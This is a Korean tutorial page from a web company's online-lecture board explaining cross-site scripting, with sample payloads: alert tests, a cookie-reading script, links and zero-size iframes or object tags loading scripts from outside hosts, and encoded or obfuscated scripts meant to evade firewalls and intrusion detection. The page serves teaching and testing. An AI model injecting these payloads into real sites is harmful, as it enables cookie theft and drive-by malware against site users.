XSS (Cross Site Scripting) 크로스 사이트 스크립팅 > 온라인강의

본문 바로가기
 
 
 
비즈니스의 시작 비즈명함 ~ 가격, 품질, 배송 3가지 만족을 드리는 비즈명함 / 즉석명함 / 급행서비스 / 서울 전지역 수도권일부 3시간배송

오늘 1,929
어제 2,158
최대 2,526
전체 3,671,679

최근 방문자

1373
2214
2264
2251
2158
1929
10 11 12 13 14 15
select * from g5_menu where me_use = '1' and me_link like '%lecture%'
온라인강좌 홈 > 온라인강좌 > 온라인강좌

Secure | XSS (Cross Site Scripting) 크로스 사이트 스크립팅

페이지 정보

작성일2017-06-01 03:31 조회1,376회 댓글0건

본문

XSS (Cross Site Scripting) 크로스 사이트 스크립팅은 서버의 서비스를 공격하는 일반적인 해킹방법이 아니라 해당 서버를 사용하는 사용자를 공격하는 기법이다. 
예를들어 서비스를 사용하는 사용자가 글을 읽으려고 클릭하는 순간 글에 연결되어 있는 스크립트가 실행되고 스크립트를 통하여 사용자에게 악성코드가 심어진다.

글, 메일, 그림 등을 열람하기 위하여 사용자들의 흥미를 유발시키기 때문에 사회공학적 해킹기법으로 분류된다.



1. XSS Test하기
일반적인 게시판에 <script>alert("XSS")</script> 라고 입력하여 XSS라는 메시지 창이 뜨면 XSS 취약점이 있는 것이다.

사용자의 쿠키값을 가지고 오게 한다
<script>alert(document.cookie);</script> 

클릭 시 악성코드가 있는 사이트로 이동
<a href="http://naver.com/test.cgi?loc=<script src='http://daum.net/test'></script>">Click here</a>



2. iframe과 메타테그 삽입으로 인한 해킹

<meta http-equiv='refresh' content='600; ur=test.php'>
<iframe src=" http://test.com/~bbs/hack.htm" width="0" height="0" frameborder="0"></iframe>
사이즈 0, 0 iframe을 만들어서 iframe에 악성코드가 들어 있는 사이트로 접속하게 만든다.



3. object 태그

<object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\nosuchfile.mht! http://test.com/attack_chm::exploit.html></object>
c:\nosuchfile.mht 파일이 없으면 악성코드가 심어져 있는 http://test.com/attack_chm::exploit.html 파일을 읽게 만든다.



4. div 기법

div 태그를 사용하여 이미지 등을 삽입시킨다.
<div style="position:absolute; left:200; top:90; z-index:2;">
    <img src="images/test.jpg">
</div>



5. 인코딩 기법

공격하려는 문자열을 다른 표현으로 인코딩하여 눈에 띠지 않거나, IPS, 웹방화벽 드의 감지패턴을 우회하기 위하여 인코딩한다.

원본 : <script>alert("test");</script>
인코딩 : <script>alert(String.fromCharCode(116, 101, 115, 116))</script>



6. Obfuscated 기법

인코딩 기법과 같이 우회하기 위해 사용한다.
<script language="javas-ript">
    e = '0x00' + '5F';
    str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1%F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2"; 
    str = tmp = '';
    for(i=0; i<str1.length; i+=3)
    { 
        tmp = unescape(str1.slice(i,i+=3));
        str = str + String.fromCharCode((tmp.charCodeAt(0)^e)-127);
    }
    document.write(str); 
</script>



7. 기타우회 방법 

</script><script>alert('XSS');</script>
;</script><script>alert('XSS');</script>
</script><script>alert('XSS');</script>



자료출처
http://blog.naver.com/sdream4/10084831337 
http://blog.naver.com/sdream4/10046998900 
  • 페이스북으로 보내기
  • 트위터로 보내기
  • 구글플러스로 보내기

댓글목록

등록된 댓글이 없습니다.


목록

Total 2,151건 1 페이지
온라인강의 목록
번호 제목
공지
일반 온라인 강좌를 소개합니다. (up.2017-12-05 16:33) 인기글 Hit.14390
2150
일반 파일명에 허용/금지 글자 (up.2017-12-15 06:00) 글수정 Hit.21
2149
2148
2147
2146
2145
그누보드 [G5] 모바일 메뉴 (up.2017-12-11 11:17) 첨부파일 Hit.47
2144
2143
2142
2141
MSSQL CentOS7 + PHP7 + SQL Server 연결 (up.2017-12-07 16:22) Hit.138
2140
2139
Linux [FreeTDS] TDS(Tabular Data Stream) (up.2017-12-07 07:03) Hit.138
2138
Linux SED 명령어 사용법 (wr.2017-12-03) Hit.137
2137
2136
일반 IP로 국가 판별하기 (wr.2017-12-01) Hit.175
2135
그누보드 [G5] 댓글(코멘트) 페이징 (up.2017-12-01 06:32) Hit.187
2134
2133
2132
2131
2130
2129
2128
2127
MySQL sql_mode (up.2017-11-26 04:25) Hit.231
게시물 검색
 
 
상호: 해피정닷컴 대표:정창용 사업자등록번호:119-05-36414 (08394) 서울시 구로구 디지털로 242 한화비즈메트로1차 1502호
전화: 070-7600-3500 팩스:02-865-3528 개인정보관리:정창용 mail@happyjung.com 에스크로확인
개인정보취급방침
COPYRIGHT 2001~2017 해피정닷컴. All rights reserved. 통신판매신고:2014-서울구로-0074
 
모바일 버전으로 보기